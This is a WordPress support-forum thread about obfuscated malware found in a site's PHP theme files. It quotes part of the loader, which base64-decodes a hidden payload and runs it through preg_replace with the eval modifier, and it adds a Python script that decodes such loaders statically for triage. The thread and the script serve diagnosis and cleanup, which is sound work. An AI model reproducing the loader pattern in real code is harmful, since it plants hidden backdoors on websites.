• Should I be worried if I have this code in my header.php and a bunch of other php files:

    <?php

    (hacked code removed, please do not post that here)

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter Ace1337

    (@ace1337)

    Ok, it goes something like “ZxIiB3aWssR0aD0iMXB4IiBoZWlnaHQss9IjFwe”

    Could you at least tell me what is that? All my sites have it but they’re working fine.

    BUT, every like 3 months or so, one of them either loses its css styling (looks white with text) or goes blank. I ask for a restore of a previous backup and it works again for a couple of months.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Did you create the theme?

    Thread Starter Ace1337

    (@ace1337)

    I’ve tried using http://sitecheck.sucuri.net/ and it says NO to everything:

    Blacklisted: No
    Malware: No
    Malicious javascript: No
    Malicious iFrames: No
    Drive-By Downloads: No
    Anomaly detection: No
    IE-only attacks: No
    Suspicious redirections: No
    Spam: No

    But it seems all my sites on that server have the weird code and I don’t know what it is. Can it be decoded somehow?

    I haven’t made the themes myself.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Do you know how it’s encoded? With which PHP function?

    Thread Starter Ace1337

    (@ace1337)

    Well, it starts like:

    <?php /*versio:2.14*/$QOO0=0;$GLOBALS[‘QOO0’] = ‘=wY3VybAWjX2luaXQYWxsb3dfdXJsX2ZvcGVu^t;I){MQdAX3NldG9wdAny yX2V4ZWMAOUXw%.Y2

    Then a HUGE chunk of gibberish that ends with:

    WoQ6261736536345f6465636f6465′;if (!function_exists(‘Il111Ill’)){function Il111Ill($a, $b){$c=$GLOBALS[‘QOO0’]; $d=pack(‘H*’,substr($c, -26)); return $d(substr($c, $a, $b));}};$Q0QO0OQQO = Il111Ill(6242, 16);$Q0QO0OQQO(“/IlI1lII11/e”, Il111Ill(651, 5590), “IlI1lII11”);?><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
    <html xmlns=”http://www.w3.org/1999/xhtml” <?php language_attributes(); ?>>

    <head profile=”http://gmpg.org/xfn/11″>
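
Added example (not part of the thread and not any poster's code): a static triage of the loader tail quoted in the post above, written in Python so that nothing from the sample runs. It reads the blob's trailing hex as the decoder name (the 26 hex characters `6261736536345f6465636f6465` spell `base64_decode`), decodes each slice the helper is called with, and flags a `/e` pattern, which makes PHP's `preg_replace` evaluate the replacement string. The `SAMPLE` string, its offsets and its payload are constructed, and the regular expressions assume the straight quotes the file has on disk rather than the curly quotes the forum rendered.

```python
import base64
import re

# Constructed sample in the shape of the loader tail quoted in the post
# (harmless payload, short blob); straight quotes as they would be on disk.
SAMPLE = (
    "<?php $GLOBALS['QOO0'] = '=wxQcHJlZ19yZXBsYWNlZWNobyAnZGVtbyc7"
    "6261736536345f6465636f6465';if (!function_exists('Il111Ill')){"
    "function Il111Ill($a, $b){$c=$GLOBALS['QOO0']; "
    "$d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};"
    "$Q0QO0OQQO = Il111Ill(4, 16);"
    '$Q0QO0OQQO("/IlI1lII11/e", Il111Ill(20, 16), "IlI1lII11");?>'
)

BLOB_RE = re.compile(r"\$GLOBALS\['\w+'\]\s*=\s*'(.*?)';", re.S)
TAIL_RE = re.compile(r"pack\('H\*',\s*substr\(\$\w+,\s*-(\d+)\)\)")
HELPER_RE = re.compile(r"function\s+(\w+)\(\$\w+,\s*\$\w+\)")


def triage(php_source):
    """Decode the loader statically; nothing from the sample is executed."""
    blob_m, tail_m, helper_m = (r.search(php_source) for r in (BLOB_RE, TAIL_RE, HELPER_RE))
    if not (blob_m and tail_m and helper_m):
        return None  # not this loader shape
    blob = blob_m.group(1)
    try:
        # PHP: pack('H*', substr($c, -N)) turns the hex tail into a function name.
        decoder = bytes.fromhex(blob[-int(tail_m.group(1)):]).decode("ascii")
    except ValueError:
        return None
    report = {"decoder": decoder, "slices": [], "eval_modifier": False}
    if decoder != "base64_decode":
        return report  # unknown decoder: report it, do not guess
    calls = re.finditer(re.escape(helper_m.group(1)) + r"\((\d+),\s*(\d+)\)", php_source)
    for call in calls:
        start, length = int(call.group(1)), int(call.group(2))
        chunk = blob[start:start + length]
        try:
            text = base64.b64decode(chunk + "=" * (-len(chunk) % 4)).decode("latin-1")
        except ValueError:
            text = None  # slice is not valid base64
        report["slices"].append((start, text))
    # A "/e" pattern handed to preg_replace makes PHP evaluate the replacement.
    report["eval_modifier"] = bool(re.search(r"""\(\s*["']/[^"']*/\w*e\w*["']""", php_source))
    return report
```

Run it over copies of the suspect files rather than the live ones; a `None` result only means the file does not match this loader shape, not that it is clean.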

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    If you’re not aware of any PHP function like base64_encode that it uses, the closest way to understanding what the code does is to look at the source code of your website for any anomalies.

    Moderator keesiemeijer

    (@keesiemeijer)

    > But it seems all my sites on that server have the weird code and I don’t know what it is.

    I’m sorry but it means your site has been hacked.

    > Can it be decoded somehow?

    It’s probably for distributing spam or malware. What that code does isn’t important at all. What’s important is that your site was compromised.

    You need to start working your way through the resources WPyogi provided above.

    Thread Starter Ace1337

    (@ace1337)

    From what I see there’s no way to fix it without a fresh installation of WP, plugins and everything for every infected site?

    The thing is that almost all the sites have lots of modifications in the code done by me, mostly simple stuff and translations to my language but it would take a lot more time than simply installing a new WP and plugins and theme.

    How come that checker says that I’m not infected?

    Moderator keesiemeijer

    (@keesiemeijer)

    > How come that checker says that I’m not infected?

    It could be a new hack. The checker can also not see inside .php files. If you’ve made many modifications and never seen the malicious code before, you can reasonably presume your site is hacked.

    There is no easy fix for this. Maybe you should contact your hosting company for tech support.

    Here is some additional reading:
    http://www.rvoodoo.com/projects/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    Thread Starter Ace1337

    (@ace1337)

    Thanks for the link.

    The weird thing is, this code doesn’t affect my site’s appearance and google has never seen my sites as “attack sites”. They don’t have any spam links on them and they work perfectly, except every few months one of them loses the styling and looks white with text on it. I run a restore and it’s back to normal again.

    Not even sure the code is causing that cause it happened only three times in two years. I made a fresh install on one site and replaced everything and after a couple of months the code is back there. The sites are working fine still.

    It takes a while for Google to add you to their list, and I’ve even watched an infected site go on and off the list over the course of a few months without any changes from the site.

    I’d love it if you sent me the files (sean at ertw dot com), or posted them to pastebin so I could look into them. Sometimes these kinds of malware post genuine links for SEO juice, or sit around waiting for instructions. It’s hard to know.

    Just for kicks, could you see if your site triggers anything at http://isithacked.com ?

    Thanks,

    Sean

    Thread Starter Ace1337

    (@ace1337)

    isithacked says it’s all fine. No cloaking, spammy links, iframes or anything.

    I dunno if posting the code would pose a threat to my site maybe?

    Do not post any hacked code here, please – it was already removed from your first post. Use a pastebin if you want to post it.

    http://codex.wordpress.org/Forum_Welcome#Posting_Code

  • The topic ‘Obfuscated code in php files’ is closed to new replies.